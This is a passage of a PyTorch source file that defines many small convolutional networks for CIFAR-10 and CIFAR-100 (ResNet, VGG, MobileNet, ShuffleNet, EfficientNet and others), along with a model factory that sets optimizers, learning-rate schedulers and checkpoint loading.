nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x) # 32x32
x = self.layer1(x) # 32x32
x = self.layer2(x) # 16x16
x = self.layer3(x) # 8x8
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
class ResNet_Cifar(nn.Module):
def __init__(self, block, layers, num_classes=10):
super(ResNet_Cifar, self).__init__()
self.inplanes = 16
self.conv1 = nn.Conv2d(3, 16, kernel_size=3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(16)
self.relu = nn.ReLU(inplace=True)
self.layer1 = self._make_layer(block, 16, layers[0])
self.layer2 = self._make_layer(block, 32, layers[1], stride=2)
self.layer3 = self._make_layer(block, 64, layers[2], stride=2)
self.avgpool = nn.AvgPool2d(8, stride=1)
self.fc = nn.Linear(64 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion)
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class ConvNetMaker(nn.Module):
"""
Creates a simple (plane) convolutional neural network
"""
def __init__(self, layers):
"""
Makes a cnn using the provided list of layers specification
The details of this list is available in the paper
:param layers: a list of strings, representing layers like ["CB32", "CB32", "FC10"]
"""
super(ConvNetMaker, self).__init__()
self.conv_layers = []
self.fc_layers = []
h, w, d = 32, 32, 3
previous_layer_filter_count = 3
previous_layer_size = h * w * d
num_fc_layers_remained = len([1 for l in layers if l.startswith('FC')])
for layer in layers:
if layer.startswith('Conv'):
filter_count = int(layer[4:])
self.conv_layers += [nn.Conv2d(previous_layer_filter_count, filter_count, kernel_size=3, padding=1),
nn.BatchNorm2d(filter_count), nn.ReLU(inplace=True)]
previous_layer_filter_count = filter_count
d = filter_count
previous_layer_size = h * w * d
elif layer.startswith('MaxPool'):
self.conv_layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
h, w = int(h / 2.0), int(w / 2.0)
previous_layer_size = h * w * d
elif layer.startswith('FC'):
num_fc_layers_remained -= 1
current_layer_size = int(layer[2:])
if num_fc_layers_remained == 0:
self.fc_layers += [nn.Linear(previous_layer_size, current_layer_size)]
else:
self.fc_layers += [nn.Linear(previous_layer_size, current_layer_size), nn.ReLU(inplace=True)]
previous_layer_size = current_layer_size
conv_layers = self.conv_layers
fc_layers = self.fc_layers
self.conv_layers = nn.Sequential(*conv_layers)
self.fc_layers = nn.Sequential(*fc_layers)
def forward(self, x):
x = self.conv_layers(x)
x = x.view(x.size(0), -1)
x = self.fc_layers(x)
return x
def resnet14_cifar(**kwargs):
model = ResNet_Cifar(BasicBlock, [2, 2, 2], **kwargs)
return model
def resnet8_cifar(**kwargs):
model = ResNet_Cifar(BasicBlock, [1, 1, 1], **kwargs)
return model
def resnet20_cifar(**kwargs):
model = ResNet_Cifar(BasicBlock, [3, 3, 3], **kwargs)
return model
def resnet26_cifar(**kwargs):
model = ResNet_Cifar(BasicBlock, [4, 4, 4], **kwargs)
return model
def resnet32_cifar(**kwargs):
model = ResNet_Cifar(BasicBlock, [5, 5, 5], **kwargs)
return model
def resnet44_cifar(**kwargs):
model = ResNet_Cifar(BasicBlock, [7, 7, 7], **kwargs)
return model
def resnet56_cifar(**kwargs):
model = ResNet_Cifar(BasicBlock, [9, 9, 9], **kwargs)
return model
def resnet110_cifar(**kwargs):
model = ResNet_Cifar(BasicBlock, [18, 18, 18], **kwargs)
# model = ResNet(depth=110)
return model
class VGG(nn.Module):
def __init__(self, features, output_dim):
super().__init__()
self.features = features
self.avgpool = nn.AdaptiveAvgPool2d(7)
self.classifier = nn.Sequential(
nn.Linear(512 * 7 * 7, 4096),
nn.ReLU(inplace=True),
nn.Dropout(0.5),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Dropout(0.5),
nn.Linear(4096, output_dim),
)
def forward(self, x):
x = self.features(x)
x = self.avgpool(x)
h = x.view(x.shape[0], -1)
x = self.classifier(h)
return x
def get_vgg_layers(config, batch_norm):
layers = []
in_channels = 3
for c in config:
assert c == 'M' or isinstance(c, int)
if c == 'M':
layers += [nn.MaxPool2d(kernel_size=2)]
else:
conv2d = nn.Conv2d(in_channels, c, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(c), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = c
return nn.Sequential(*layers)
def vgg11_cifar(**kwargs):
model = VGG(get_vgg_layers(vgg11_config, batch_norm=True), class_num)
return model
def vgg13_cifar(**kwargs):
model = VGG(get_vgg_layers(vgg13_config, batch_norm=True), class_num)
return model
def vgg16_cifar(**kwargs):
model = VGG(get_vgg_layers(vgg16_config, batch_norm=True), class_num)
return model
def vgg19_cifar(**kwargs):
model = VGG(get_vgg_layers(vgg19_config, batch_norm=True), kwargs['num_classes'])
return model
class AlexNet(nn.Module):
def __init__(self, num_classes):
super(AlexNet, self).__init__()
self.features = nn.Sequential(
nn.Conv2d(in_channels=3,
out_channels=64,
kernel_size=3,
stride=1,
padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2,
stride=2),
nn.Conv2d(in_channels=64,
out_channels=192,
kernel_size=3,
stride=1,
padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2,
stride=2),
nn.Conv2d(in_channels=192,
out_channels=384,
kernel_size=3,
stride=1,
padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels=384,
out_channels=256,
kernel_size=3,
stride=1,
padding=1),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels=256,
out_channels=256,
kernel_size=3,
stride=1,
padding=1),
nn.ReLU(inplace=True),
nn.MaxPool2d(kernel_size=2,
stride=2),
)
self.avgpool = nn.AdaptiveAvgPool2d((6, 6))
self.classifier = nn.Sequential(
nn.Dropout(),
nn.Linear(256 * 6 * 6, 4096),
nn.ReLU(inplace=True),
nn.Dropout(),
nn.Linear(4096, 4096),
nn.ReLU(inplace=True),
nn.Linear(4096, num_classes),
)
# forward: forward propagation
def forward(self, x: torch.Tensor) -> torch.Tensor:
x = self.features(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
x = self.classifier(x)
return x
class LeNet(nn.Module):
def __init__(self):
super(LeNet, self).__init__()
self.conv1 = nn.Conv2d(3, 6, kernel_size=5)
self.conv2 = nn.Conv2d(6, 16, kernel_size=5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
x = F.relu(self.conv1(x))
x = F.max_pool2d(x, 2)
x = F.relu(self.conv2(x))
x = F.max_pool2d(x, 2)
x = x.view(x.size(0), -1)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
class Inception(nn.Module):
def __init__(self, in_planes, n1x1, n3x3red, n3x3, n5x5red, n5x5, pool_planes):
super(Inception, self).__init__()
# 1x1 conv branch
self.b1 = nn.Sequential(
nn.Conv2d(in_planes, n1x1, kernel_size=1),
nn.BatchNorm2d(n1x1),
nn.ReLU(True),
)
# 1x1 conv -> 3x3 conv branch
self.b2 = nn.Sequential(
nn.Conv2d(in_planes, n3x3red, kernel_size=1),
nn.BatchNorm2d(n3x3red),
nn.ReLU(True),
nn.Conv2d(n3x3red, n3x3, kernel_size=3, padding=1),
nn.BatchNorm2d(n3x3),
nn.ReLU(True),
)
# 1x1 conv -> 5x5 conv branch
self.b3 = nn.Sequential(
nn.Conv2d(in_planes, n5x5red, kernel_size=1),
nn.BatchNorm2d(n5x5red),
nn.ReLU(True),
nn.Conv2d(n5x5red, n5x5, kernel_size=3, padding=1),
nn.BatchNorm2d(n5x5),
nn.ReLU(True),
nn.Conv2d(n5x5, n5x5, kernel_size=3, padding=1),
nn.BatchNorm2d(n5x5),
nn.ReLU(True),
)
# 3x3 pool -> 1x1 conv branch
self.b4 = nn.Sequential(
nn.MaxPool2d(3, stride=1, padding=1),
nn.Conv2d(in_planes, pool_planes, kernel_size=1),
nn.BatchNorm2d(pool_planes),
nn.ReLU(True),
)
def forward(self, x):
y1 = self.b1(x)
y2 = self.b2(x)
y3 = self.b3(x)
y4 = self.b4(x)
return torch.cat([y1, y2, y3, y4], 1)
class GoogLeNet(nn.Module):
def __init__(self):
super(GoogLeNet, self).__init__()
self.pre_layers = nn.Sequential(
nn.Conv2d(3, 192, kernel_size=3, padding=1),
nn.BatchNorm2d(192),
nn.ReLU(True),
)
self.a3 = Inception(192, 64, 96, 128, 16, 32, 32)
self.b3 = Inception(256, 128, 128, 192, 32, 96, 64)
self.maxpool = nn.MaxPool2d(3, stride=2, padding=1)
self.a4 = Inception(480, 192, 96, 208, 16, 48, 64)
self.b4 = Inception(512, 160, 112, 224, 24, 64, 64)
self.c4 = Inception(512, 128, 128, 256, 24, 64, 64)
self.d4 = Inception(512, 112, 144, 288, 32, 64, 64)
self.e4 = Inception(528, 256, 160, 320, 32, 128, 128)
self.a5 = Inception(832, 256, 160, 320, 32, 128, 128)
self.b5 = Inception(832, 384, 192, 384, 48, 128, 128)
self.avgpool = nn.AvgPool2d(8, stride=1)
self.linear = nn.Linear(1024, 10)
def forward(self, x):
out = self.pre_layers(x)
out = self.a3(out)
out = self.b3(out)
out = self.maxpool(out)
out = self.a4(out)
out = self.b4(out)
out = self.c4(out)
out = self.d4(out)
out = self.e4(out)
out = self.maxpool(out)
out = self.a5(out)
out = self.b5(out)
out = self.avgpool(out)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
class MobileNet_Block(nn.Module):
'''Depthwise conv + Pointwise conv'''
def __init__(self, in_planes, out_planes, stride=1):
super(MobileNet_Block, self).__init__()
self.conv1 = nn.Conv2d(in_planes, in_planes, kernel_size=3, stride=stride, padding=1, groups=in_planes,
bias=False)
self.bn1 = nn.BatchNorm2d(in_planes)
self.conv2 = nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=1, padding=0, bias=False)
self.bn2 = nn.BatchNorm2d(out_planes)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
return out
class MobileNet(nn.Module):
# (128,2) means conv planes=128, conv stride=2, by default conv stride=1
cfg = [64, (128, 2), 128, (256, 2), 256, (512, 2), 512, 512, 512, 512, 512, (1024, 2), 1024]
def __init__(self, num_classes=10):
super(MobileNet, self).__init__()
self.conv1 = nn.Conv2d(3, 32, kernel_size=3, stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(32)
self.layers = self._make_layers(in_planes=32)
self.linear = nn.Linear(1024, num_classes)
def _make_layers(self, in_planes):
layers = []
for x in self.cfg:
out_planes = x if isinstance(x, int) else x[0]
stride = 1 if isinstance(x, int) else x[1]
layers.append(MobileNet_Block(in_planes, out_planes, stride))
in_planes = out_planes
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layers(out)
out = F.avg_pool2d(out, 2)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
class fire(nn.Module):
def __init__(self, inplanes, squeeze_planes, expand_planes):
super(fire, self).__init__()
self.conv1 = nn.Conv2d(inplanes, squeeze_planes, kernel_size=1, stride=1)
self.bn1 = nn.BatchNorm2d(squeeze_planes)
self.relu1 = nn.ReLU(inplace=True)
self.conv2 = nn.Conv2d(squeeze_planes, expand_planes, kernel_size=1, stride=1)
self.bn2 = nn.BatchNorm2d(expand_planes)
self.conv3 = nn.Conv2d(squeeze_planes, expand_planes, kernel_size=3, stride=1, padding=1)
self.bn3 = nn.BatchNorm2d(expand_planes)
self.relu2 = nn.ReLU(inplace=True)
# using MSR initilization
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.in_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu1(x)
out1 = self.conv2(x)
out1 = self.bn2(out1)
out2 = self.conv3(x)
out2 = self.bn3(out2)
out = torch.cat([out1, out2], 1)
out = self.relu2(out)
return out
class SqueezeNet(nn.Module):
def __init__(self):
super(SqueezeNet, self).__init__()
self.conv1 = nn.Conv2d(3, 96, kernel_size=3, stride=1, padding=1) # 32
self.bn1 = nn.BatchNorm2d(96)
self.relu = nn.ReLU(inplace=True)
self.maxpool1 = nn.MaxPool2d(kernel_size=2, stride=2) # 16
self.fire2 = fire(96, 16, 64)
self.fire3 = fire(128, 16, 64)
self.fire4 = fire(128, 32, 128)
self.maxpool2 = nn.MaxPool2d(kernel_size=2, stride=2) # 8
self.fire5 = fire(256, 32, 128)
self.fire6 = fire(256, 48, 192)
self.fire7 = fire(384, 48, 192)
self.fire8 = fire(384, 64, 256)
self.maxpool3 = nn.MaxPool2d(kernel_size=2, stride=2) # 4
self.fire9 = fire(512, 64, 256)
self.conv2 = nn.Conv2d(512, 10, kernel_size=1, stride=1)
self.avg_pool = nn.AvgPool2d(kernel_size=4, stride=4)
self.softmax = nn.LogSoftmax(dim=1)
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.in_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool1(x)
x = self.fire2(x)
x = self.fire3(x)
x = self.fire4(x)
x = self.maxpool2(x)
x = self.fire5(x)
x = self.fire6(x)
x = self.fire7(x)
x = self.fire8(x)
x = self.maxpool3(x)
x = self.fire9(x)
x = self.conv2(x)
x = self.avg_pool(x)
x = x.view(x.size(0), -1)
x = self.softmax(x)
return x
class ShuffleBlock(nn.Module):
def __init__(self, groups):
super(ShuffleBlock, self).__init__()
self.groups = groups
def forward(self, x):
'''Channel shuffle: [N,C,H,W] -> [N,g,C/g,H,W] -> [N,C/g,g,H,w] -> [N,C,H,W]'''
N, C, H, W = x.size()
g = self.groups
return x.view(N, g, C // g, H, W).permute(0, 2, 1, 3, 4).reshape(N, C, H, W)
class Bottleneck(nn.Module):
def __init__(self, in_planes, out_planes, stride, groups):
super(Bottleneck, self).__init__()
self.stride = stride
mid_planes = out_planes // 4
g = 1 if in_planes == 24 else groups
self.conv1 = nn.Conv2d(in_planes, mid_planes, kernel_size=1, groups=g, bias=False)
self.bn1 = nn.BatchNorm2d(mid_planes)
self.shuffle1 = ShuffleBlock(groups=g)
self.conv2 = nn.Conv2d(mid_planes, mid_planes, kernel_size=3, stride=stride, padding=1, groups=mid_planes,
bias=False)
self.bn2 = nn.BatchNorm2d(mid_planes)
self.conv3 = nn.Conv2d(mid_planes, out_planes, kernel_size=1, groups=groups, bias=False)
self.bn3 = nn.BatchNorm2d(out_planes)
self.shortcut = nn.Sequential()
if stride == 2:
self.shortcut = nn.Sequential(nn.AvgPool2d(3, stride=2, padding=1))
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.shuffle1(out)
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
res = self.shortcut(x)
out = F.relu(torch.cat([out, res], 1)) if self.stride == 2 else F.relu(out + res)
return out
class ShuffleNet(nn.Module):
def __init__(self, cfg):
super(ShuffleNet, self).__init__()
out_planes = cfg['out_planes']
num_blocks = cfg['num_blocks']
groups = cfg['groups']
self.conv1 = nn.Conv2d(3, 24, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(24)
self.in_planes = 24
self.layer1 = self._make_layer(out_planes[0], num_blocks[0], groups)
self.layer2 = self._make_layer(out_planes[1], num_blocks[1], groups)
self.layer3 = self._make_layer(out_planes[2], num_blocks[2], groups)
self.linear = nn.Linear(out_planes[2], 10)
def _make_layer(self, out_planes, num_blocks, groups):
layers = []
for i in range(num_blocks):
stride = 2 if i == 0 else 1
cat_planes = self.in_planes if i == 0 else 0
layers.append(Bottleneck(self.in_planes, out_planes - cat_planes, stride=stride, groups=groups))
self.in_planes = out_planes
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = F.avg_pool2d(out, 4)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
def ShuffleNetG2():
cfg = {
'out_planes': [200, 400, 800],
'num_blocks': [4, 8, 4],
'groups': 2
}
return ShuffleNet(cfg)
def ShuffleNetG3():
cfg = {
'out_planes': [240, 480, 960],
'num_blocks': [4, 8, 4],
'groups': 3
}
return ShuffleNet(cfg)
class Block(nn.Module):
'''expand + depthwise + pointwise + squeeze-excitation'''
def __init__(self, in_planes, out_planes, expansion, stride):
super(Block, self).__init__()
self.stride = stride
planes = expansion * in_planes
self.conv1 = nn.Conv2d(
in_planes, planes, kernel_size=1, stride=1, padding=0, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,
stride=stride, padding=1, groups=planes, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(
planes, out_planes, kernel_size=1, stride=1, padding=0, bias=False)
self.bn3 = nn.BatchNorm2d(out_planes)
self.shortcut = nn.Sequential()
if stride == 1 and in_planes != out_planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, out_planes, kernel_size=1,
stride=1, padding=0, bias=False),
nn.BatchNorm2d(out_planes),
)
# SE layers
self.fc1 = nn.Conv2d(out_planes, out_planes//16, kernel_size=1)
self.fc2 = nn.Conv2d(out_planes//16, out_planes, kernel_size=1)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
shortcut = self.shortcut(x) if self.stride == 1 else out
# Squeeze-Excitation
w = F.avg_pool2d(out, out.size(2))
w = F.relu(self.fc1(w))
w = self.fc2(w).sigmoid()
out = out * w + shortcut
return out
class EfficientNet(nn.Module):
def __init__(self, cfg, num_classes=10):
super(EfficientNet, self).__init__()
self.cfg = cfg
self.conv1 = nn.Conv2d(3, 32, kernel_size=3,
stride=1, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(32)
self.layers = self._make_layers(in_planes=32)
self.linear = nn.Linear(cfg[-1][1], num_classes)
def _make_layers(self, in_planes):
layers = []
for expansion, out_planes, num_blocks, stride in self.cfg:
strides = [stride] + [1]*(num_blocks-1)
for stride in strides:
layers.append(Block(in_planes, out_planes, expansion, stride))
in_planes = out_planes
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layers(out)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
def EfficientNetB0():
# (expansion, out_planes, num_blocks, stride)
cfg = [(1, 16, 1, 2),
(6, 24, 2, 1),
(6, 40, 2, 2),
(6, 80, 3, 2),
(6, 112, 3, 1),
(6, 192, 4, 2),
(6, 320, 1, 2)]
return EfficientNet(cfg)
resnet_book = {
'8': resnet8_cifar,
'14': resnet14_cifar,
'20': resnet20_cifar,
'26': resnet26_cifar,
'32': resnet32_cifar,
'44': resnet44_cifar,
'56': resnet56_cifar,
'110': resnet110_cifar,
}
plane_cifar10_book = {
'2': ['Conv16', 'MaxPool', 'Conv16', 'MaxPool', 'FC10'],
'4': ['Conv16', 'Conv16', 'MaxPool', 'Conv32', 'Conv32', 'MaxPool', 'FC10'],
'6': ['Conv16', 'Conv16', 'MaxPool', 'Conv32', 'Conv32', 'MaxPool', 'Conv64', 'Conv64', 'MaxPool', 'FC10'],
'8': ['Conv16', 'Conv16', 'MaxPool', 'Conv32', 'Conv32', 'MaxPool', 'Conv64', 'Conv64', 'MaxPool',
'Conv128', 'Conv128', 'MaxPool', 'FC64', 'FC10'],
'10': ['Conv32', 'Conv32', 'MaxPool', 'Conv64', 'Conv64', 'MaxPool', 'Conv128', 'Conv128', 'MaxPool',
'Conv256', 'Conv256', 'Conv256', 'Conv256', 'MaxPool', 'FC128', 'FC10'],
}
plane_cifar100_book = {
'2': ['Conv32', 'MaxPool', 'Conv32', 'MaxPool', 'FC100'],
'4': ['Conv32', 'Conv32', 'MaxPool', 'Conv64', 'Conv64', 'MaxPool', 'FC100'],
'6': ['Conv32', 'Conv32', 'MaxPool', 'Conv64', 'Conv64', 'MaxPool', 'Conv128', 'Conv128', 'FC100'],
'8': ['Conv32', 'Conv32', 'MaxPool', 'Conv64', 'Conv64', 'MaxPool', 'Conv128', 'Conv128', 'MaxPool',
'Conv256', 'Conv256', 'MaxPool', 'FC64', 'FC100'],
'10': ['Conv32', 'Conv32', 'MaxPool', 'Conv64', 'Conv64', 'MaxPool', 'Conv128', 'Conv128', 'MaxPool',
'Conv256', 'Conv256', 'Conv256', 'Conv256', 'MaxPool', 'FC512', 'FC100'],
}
vgg11_config = [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M']
vgg13_config = [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M']
vgg16_config = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512,
512, 'M']
vgg19_config = [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M',
512, 512, 512, 512, 'M']
vgg_cifar10_book = {
'11': vgg11_cifar,
'13': vgg13_cifar,
'16': vgg16_cifar,
'19': vgg19_cifar,
}
def is_resnet(name):
"""
Simply checks if name represents a resnet, by convention, all resnet names start with 'resnet'
:param name:
:return:
"""
name = name.lower()
if name.startswith("resnet"):
return 'resnet'
elif name.startswith('plane'):
return 'plane'
elif name.startswith('alexnet'):
return 'alexnet'
elif name.startswith('vgg'):
return 'vgg'
elif name.startswith('resnext'):
return 'resnext'
elif name.startswith('lenet'):
return 'lenet'
elif name.startswith('googlenet'):
return 'googlenet'
elif name.startswith('mobilenet'):
return 'mobilenet'
elif name.startswith('squeezenet'):
return 'squeezenet'
elif name.startswith('shufflenet'):
return 'shufflenet'
elif name.startswith('efficientnetb0'):
return 'efficientnetb0'
def create_cnn_model(name, dataset="cifar100", total_epochs = 160, model_path = None, use_cuda = False):
"""
Create a student for training, given student name and dataset
:param name: name of the student. e.g., resnet110, resnet32, plane2, plane10, ...
:param dataset: the dataset which is used to determine last layer's output size. Options are cifar10 and cifar100.
:return: a pytorch student for neural network
"""
num_classes = 100 if dataset == 'cifar100' else 10
model = None
scheduler = None
if is_resnet(name) == 'resnet':
resnet_size = name[6:]
resnet_model = resnet_book.get(resnet_size)(num_classes = num_classes)
model = resnet_model
optimizer = torch.optim.SGD(model.parameters(), lr=0.1, momentum=0.9, weight_decay=1e-4)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, [total_epochs/2, total_epochs*3/4, total_epochs], gamma=0.1, last_epoch=-1)
# scheduler = MultiStepLR(optimizer, 5, total_epochs, [total_epochs/2, total_epochs*3/4, total_epochs], 0.1)
elif is_resnet(name) == 'plane':
plane_size = name[5:]
model_spec = plane_cifar10_book.get(plane_size) if num_classes == 10 else plane_cifar100_book.get(
plane_size)
plane_model = ConvNetMaker(model_spec)
model = plane_model
optimizer = torch.optim.SGD(model.parameters(), lr=0.01, momentum=0.9, weight_decay=1e-4)
scheduler = torch.optim.lr_scheduler.StepLR(optimizer, total_epochs*2, gamma=0.1, last_epoch=-1)
elif is_resnet(name) == 'vgg':
vgg_size = name[3:]
vgg_model = vgg_cifar10_book.get(vgg_size)(num_classes=num_classes)
model = vgg_model
optimizer = torch.optim.Adam(model.parameters(), lr=1e-4)
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer)
elif is_resnet(name) == 'alexnet':
alexnet_model = AlexNet(num_classes)
model = alexnet_model
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
# scheduler = ExponentialLR(optimizer, 10, total_epochs, last_epoch=-1)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[total_epochs*3/8, total_epochs*3/4, total_epochs], gamma=0.5)
elif is_resnet(name) == 'lenet':
lenet_model = LeNet()
model = lenet_model
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
# scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=10, gamma=0.1)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,
[total_epochs * 3 / 8, total_epochs * 3 / 4, total_epochs],
gamma=0.5)
elif is_resnet(name) == 'googlenet':
googlenet_model = GoogLeNet()
model = googlenet_model
optimizer = torch.optim.Adam(model.parameters(), lr=0.001, betas=(0.9, 0.999), eps=1e-08, weight_decay=0)
# scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, [total_epochs / 2, total_epochs * 3 / 4, total_epochs], gamma=0.1, last_epoch=-1)
# optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, [total_epochs*3 / 8, total_epochs * 3 / 4, total_epochs], gamma=0.5)
elif is_resnet(name) == 'mobilenet':
mobilenet_model = MobileNet()
model = mobilenet_model
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, [total_epochs*3 / 8, total_epochs * 3 / 4, total_epochs], gamma=0.5)
elif is_resnet(name) == 'squeezenet':
squeezenet_model = SqueezeNet()
model = squeezenet_model
optimizer = torch.optim.SGD(model.parameters(), lr=0.001, momentum=0.9, weight_decay=5e-4)
# optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
# scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, [total_epochs / 2, total_epochs * 3 / 4, total_epochs], gamma=0.1, last_epoch=-1)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,
[total_epochs * 3 / 8, total_epochs * 3 / 4, total_epochs],
gamma=0.5)
elif is_resnet(name) == 'shufflenet':
shufflenet_type = name[10:]
if shufflenet_type == 'g2' or shufflenet_type == 'G2':
shufflenet_model = ShuffleNetG2()
else:
shufflenet_model = ShuffleNetG3()
model = shufflenet_model
optimizer = torch.optim.Adam(model.parameters(), lr=0.001, betas=(0.9, 0.999), eps=1e-08, weight_decay=0)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, [total_epochs*3 / 8, total_epochs * 3 / 4, total_epochs], gamma=0.5)
elif is_resnet(name) == 'efficientnetb0':
efficientnetb0_model = EfficientNetB0()
model = efficientnetb0_model
optimizer = torch.optim.SGD(model.parameters(), lr=0.001, momentum=0.9, weight_decay=5e-4)
# Assuming optimizer uses lr = 0.05 for all groups
# lr = 0.05 if epoch < 30
# lr = 0.005 if 30 <= epoch < 60
# lr = 0.0005 if 60 <= epoch < 90
# ...
# scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=200, gamma=0.1)
scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,
[total_epochs * 3 / 8, total_epochs * 3 / 4, total_epochs],
gamma=0.5)
# copy to cuda if activated
if use_cuda:
model = model.cuda()
if model_path:
print(model_path)
checkpoint = torch.load(model_path)
pass
if 'base-model' in checkpoint:
model.load_state_dict(checkpoint['base-model'])
elif 'state_dict' in checkpoint:
model.load_state_dict(checkpoint['state_dict'])
if 'scheduler' in checkpoint:
scheduler.load_state_dict(checkpoint['scheduler'])
if 'optimizer' in checkpoint:
optimizer.load_state_dict(checkpoint['optimizer'])
return model, optimizer, scheduler
class Transition(nn.Module):
def __init__(self, in_planes, out_planes):
super(Transition, self).__init__()
self.bn = nn.BatchNorm2d(in_planes)
self.conv = nn.Conv2d(in_planes, out_planes, kernel_size=1, bias=False)
def forward(self, x):
x = self.conv(F.relu(self.bn(x)))
x = F.avg_pool2d(x, 2)
return x
class DenseNet(nn.Module):
def __init__(self, block, num_block, growth_rate=12, reduction=0.5, num_classes=10):
super(DenseNet, self).__init__()
self.growth_rate = growth_rate
num_planes = 2 * growth_rate
self.conv1 = nn.Conv2d(3, num_planes, kernel_size=3, padding=1, bias=False)
self.dense1 = self._make_dense_layers(block, num_planes, num_block[0])
num_planes += num_block[0] * growth_rate
out_planes = int(math.floor(num_planes * reduction))
self.trans1 = Transition(num_planes, out_planes)
